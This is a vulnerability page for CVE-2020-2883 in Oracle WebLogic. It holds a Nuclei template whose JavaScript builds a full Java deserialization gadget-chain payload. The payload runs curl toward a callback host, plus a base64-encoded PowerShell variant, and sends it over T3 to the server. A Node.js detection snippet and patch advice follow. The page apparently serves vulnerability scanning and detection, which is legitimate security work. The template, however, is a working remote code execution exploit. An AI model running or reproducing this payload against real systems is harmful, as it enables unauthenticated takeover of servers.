Oracle WebLogic Server - Remote Code Execution
CVE-2020-2883 (Verified)

Description
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Severity: Critical
CVSS Score: 9.8
Exploit Probability: 94%
Affected Product: weblogic_server
Published Date: October 14, 2025
Template Author: daffainfo
CVE-2020-2883.yaml
id: CVE-2020-2883

info:
  name: Oracle WebLogic Server - Remote Code Execution
  author: daffainfo
  severity: critical
  description: |
    Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
  impact: |
    Unauthenticated attackers can exploit unsafe deserialization over IIOP/T3 protocols to achieve complete takeover of Oracle WebLogic Server instances.
  remediation: |
    Upgrade to Oracle WebLogic Server versions that include patches for this vulnerability as described in the Oracle April 2020 CPU.
  reference:
    - http://packetstormsecurity.com/files/157950/WebLogic-Server-Deserialization-Remote-Code-Execution.html
    - https://www.oracle.com/security-alerts/cpuapr2020.html
    - https://www.zerodayinitiative.com/advisories/ZDI-20-504/
    - https://www.zerodayinitiative.com/advisories/ZDI-20-570/
    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/weblogic_deserialize_badattr_extcomp.rb
    - https://nvd.nist.gov/vuln/detail/CVE-2020-2883
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-2883
    cwe-id: CWE-502
    epss-score: 0.94371
    epss-percentile: 0.99965
    cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: oracle
    product: weblogic_server
    shodan-query: product:"oracle weblogic"
  tags: cve,cve2020,oracle,weblogic,javascript,rce,intrusive,kev,vkev,vuln

flow: http(1) && javascript(1)

http:
  - method: GET
    path:
      - '{{BaseURL}}/console/login/LoginForm.jsp'

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "10.3.6.0", "12.1.3.0", "12.2.1.3", "12.2.1.4")'
          - 'contains(body, "WebLogic Server Version:")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - 'WebLogic\s+Server\s+Version:\s+([0-9.]+)'
        internal: true

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);

    code: |
      const m = require('nuclei/net');
      const command1 = "/bin/sh -c curl http://" + oast;
      const command2 = "cmd.exe /c powershell.exe -nop -ep bypass -e " + btoa("curl http://" + oast);
      const address = Host+":"+Port;
      // Version extracted by the http(1) step; selects the matching serialVersionUIDs below.
      const version = template.version;
      let conn, conn2;
      conn = m.Open('tcp', address);
      conn2 = m.Open('tcp', address);
      // Per-version serialVersionUID hex for each class in the serialized stream.
      function extractorCompUid(versionNo) {
        switch (versionNo) {
          case '12.1.3.0.0':
            return 'c7ad6d3a676f3c18';
          case '12.2.1.3.0':
            return 'fb4ac83df1d72edc';
          default:
            return 'f9b3bc58cc52cd21';
        }
      }
      function chainedExtractorUid(versionNo) {
        switch (versionNo) {
          case '12.1.3.0.0':
            return '889f81b0945d5b7f';
          case '12.2.1.3.0':
            return '06ee10433a4cc4b4';
          default:
            return '435b250b72f63db5';
        }
      }
      function abstractExtractorUid(versionNo) {
        switch (versionNo) {
          case '12.1.3.0.0':
            return '658195303e723821';
          case '12.2.1.3.0':
            return '752289ad4d460138';
          default:
            return '9b1be18ed70100e5';
        }
      }
      function reflectionExtractorUid(versionNo) {
        switch (versionNo) {
          case '12.1.3.0.0':
            return 'ee7ae995c02fb4a2';
          case '12.2.1.3.0':
            return '87973791b26429dd';
          default:
            return '1f62f564b951b614';
        }
      }
      function reflectExtractCount(versionNo) {
        return versionNo === '12.2.1.3.0' ? '3' : '2';
      }
      function changeHandle(versionNo) {
        return versionNo === '12.2.1.3.0' ? '007e0012' : '007e0011';
      }
      function addSect(versionNo) {
        return versionNo === '12.2.1.3.0' ? '4c00116d5f657874726163746f724361636865647400124c6a6176612f6c616e672f4f626a6563743b' : '';
      }
      function addTcNull(versionNo) {
        return versionNo === '12.2.1.3.0' ? '70' : '';
      }
      // Wrap the serialized object in a T3 request; the first 4 bytes carry the total length.
      function t3_send(payload_obj) {
        let request_obj = '000009f3016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000'
          + payload_obj
          + 'fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200074900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870774621000000000000000000093132372e302e312e31000b75732d6c2d627265656e73a53caff10000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff0078fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771d018140128134bf427600093132372e302e312e31a53caff1000000000078';
        const newLen = (parseInt(request_obj.length / 2)).toString(16).padStart(8, '0');
        request_obj = newLen + request_obj.slice(8);
        return request_obj;
      }
      // Encode the command as three TC_STRING (0x74) records: length-prefixed hex.
      function formatPayload(payloadCmd) {
        const parts = payloadCmd.split(' ');
        const first = parts[0] || '';
        const second = parts[1] || '';
        const rest = parts.slice(2).join(' ') || '';
        return [first, second, rest].map(part => {
          const lenHex = part.length.toString(16).padStart(4, '0');
          const partHex = [...part].map(c => c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
          return '74' + lenHex + partHex;
        }).join('');
      }
      function buildPayloadObj(payload_data) {
        let payload_obj = 'aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b78700000000273720030636f6d2e74616e676f736f6c2e7574696c2e636f6d70617261746f722e457874726163746f72436f6d70617261746f72'
          + extractorCompUid(version)
          + '0200014c000b6d5f657874726163746f727400224c636f6d2f74616e676f736f6c2f7574696c2f56616c7565457874726163746f723b78707372002c636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e436861696e6564457874726163746f72'
          + chainedExtractorUid(version)
          + '02000078720036636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e4162737472616374436f6d706f73697465457874726163746f72086b3d8c05690f440200015b000c6d5f61457874726163746f727400235b4c636f6d2f74616e676f736f6c2f7574696c2f56616c7565457874726163746f723b7872002d636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e4162737472616374457874726163746f72'
          + abstractExtractorUid(version)
          + '0200014900096d5f6e546172676574787000000000757200235b4c636f6d2e74616e676f736f6c2e7574696c2e56616c7565457874726163746f723b2246204735c4a0fe0200007870000000037372002f636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e5265666c656374696f6e457874726163746f72'
          + reflectionExtractorUid(version)
          + '02000'
          + reflectExtractCount(version)
          + '5b00096d5f616f506172616d7400135b4c6a6176612f6c616e672f4f626a6563743b'
          + addSect(version)
          + '4c00096d5f734d6574686f647400124c6a6176612f6c616e672f537472696e673b7871007e000900000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000000'
          + addTcNull(version)
          + '7400096765744d6574686f647371007e000d000000007571'
          + changeHandle(version)
          + '00000002707571'
          + changeHandle(version)
          + '00000000'
          + addTcNull(version)
          + '740006696e766f6b657371007e000d000000007571'
          + changeHandle(version)
          + '00000001757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b47020000787000000003'
          // Insert payload here
          + formatPayload(payload_data)
          + addTcNull(version)
          + '74000465786563770400000003767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707400013178';
        return payload_obj;
      }
      // T3 handshake ("t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n"); the server answers with "HELO:".
      let shake = '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a';
      // For linux
      conn.SendHex(shake);
      let resp = conn.RecvString();
      Export(resp);
      let linux_obj = buildPayloadObj(command1);
      let linux_payload = t3_send(linux_obj);
      conn.SendHex(linux_payload);
      conn.Close();
      // For windows
      conn2.SendHex(shake);
      let resp2 = conn2.RecvString();
      Export(resp2);
      let windows_obj = buildPayloadObj(command2);
      let windows_payload = t3_send(windows_obj);
      conn2.SendHex(windows_payload);
      conn2.Close();

    args:
      Host: "{{Host}}"
      Port: 7001
      oast: "{{interactsh-url}}"

    matchers:
      - type: dsl
        dsl:
          - "success == true"
          - "contains(response, 'HELO:')"
          - "contains(interactsh_protocol, 'http')"
        condition: and
# digest: 4a0a004730450221009dcf5631c2650bf6a793fbfd266e73328ee2e897ad4b149c8ee5463386edf8d80220276026c6fb83e937f13bd45811820568205512ad6919781d11e824ea2331216a:922c64590222798bb761d5b6d8e72950
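What a T3-aware network sensor or a deserialization filter can key on, as an added example (Node.js, not part of the template above): it decodes the template's T3 handshake hex and lists the Java class names carried in the first bytes of the serialized stream that buildPayloadObj assembles, flagging the Coherence gadget classes. The sample hex is copied from the template and truncated after the second class descriptor; the GADGET_CLASSES list is an assumption taken from the class names in that stream.

```javascript
// Added example (not from the template): what a T3-aware sensor can key on.
// Sample hex copied from the template: the T3 handshake and the first bytes
// of the serialized stream built by buildPayloadObj (truncated here).
const T3_HANDSHAKE_HEX =
  '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a';
const PAYLOAD_PREFIX_HEX =
  'aced0005' +                                                      // STREAM_MAGIC, version 5
  '73720017' + '6a6176612e7574696c2e5072696f726974795175657565' +  // java.util.PriorityQueue
  '94da30b4fb3f82b1030002' + '49000473697a65' +                     // SUID, flags, int size
  '4c000a636f6d70617261746f72740016' +                               // L comparator ->
  '4c6a6176612f7574696c2f436f6d70617261746f723b' + '787000000002' + // Ljava/util/Comparator;
  '73720030' +
  '636f6d2e74616e676f736f6c2e7574696c2e636f6d70617261746f722e457874726163746f72436f6d70617261746f72';
// Coherence classes forming the ExtractorComparator gadget chain (CWE-502); assumed list.
const GADGET_CLASSES = [
  'com.tangosol.util.comparator.ExtractorComparator',
  'com.tangosol.util.extractor.ChainedExtractor',
  'com.tangosol.util.extractor.ReflectionExtractor',
];

// Parse a T3 hello ("t3 <ver>\nAS:<n>\nHL:<n>\nMS:<n>\n\n"); null if not T3.
function parseT3Handshake(hex) {
  const text = Buffer.from(hex, 'hex').toString('latin1');
  const lines = text.split('\n').filter(Boolean);
  const [proto, version] = (lines[0] || '').split(' ');
  if (!/^t3s?$/.test(proto)) return null;
  const fields = {};
  for (const line of lines.slice(1)) {
    const [key, value] = line.split(':');
    fields[key] = value;
  }
  return { version, ...fields };
}

// Dotted Java class names referenced by a raw Java serialization stream.
function javaClassNames(hex) {
  const buf = Buffer.from(hex, 'hex');
  if (buf.length < 4 || buf.readUInt16BE(0) !== 0xaced) return [];
  const re = /(?:[A-Za-z_$][\w$]*\.){2,}[A-Za-z_$][\w$]*/g;
  return [...new Set(buf.toString('latin1').match(re) || [])];
}

// Known gadget classes present in the stream; a non-empty result is an alert.
function gadgetClassesIn(hex) {
  const seen = new Set(javaClassNames(hex));
  return GADGET_CLASSES.filter((c) => seen.has(c));
}

console.log(parseT3Handshake(T3_HANDSHAKE_HEX), gadgetClassesIn(PAYLOAD_PREFIX_HEX));
```

The same class-name scan can be pointed at a full T3 capture or at an ObjectInputStream filter log; a stream naming any Coherence extractor class arriving unauthenticated on port 7001 is exactly the traffic the template's matchers expect.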
CVSS Metrics
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID: CVE-2020-2883
CWE ID: CWE-502
References
http://packetstormsecurity.com/files/157950/WebLogic-Server-Deserialization-Remote-Code-Execution.html
https://www.oracle.com/security-alerts/cpuapr2020.html
https://www.zerodayinitiative.com/advisories/ZDI-20-504/
https://www.zerodayinitiative.com/advisories/ZDI-20-570/
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/weblogic_deserialize_badattr_extcomp.rb
https://nvd.nist.gov/vuln/detail/CVE-2020-2883
Remediation Steps
Upgrade to Oracle WebLogic Server versions that include patches for this vulnerability as described in the Oracle April 2020 CPU.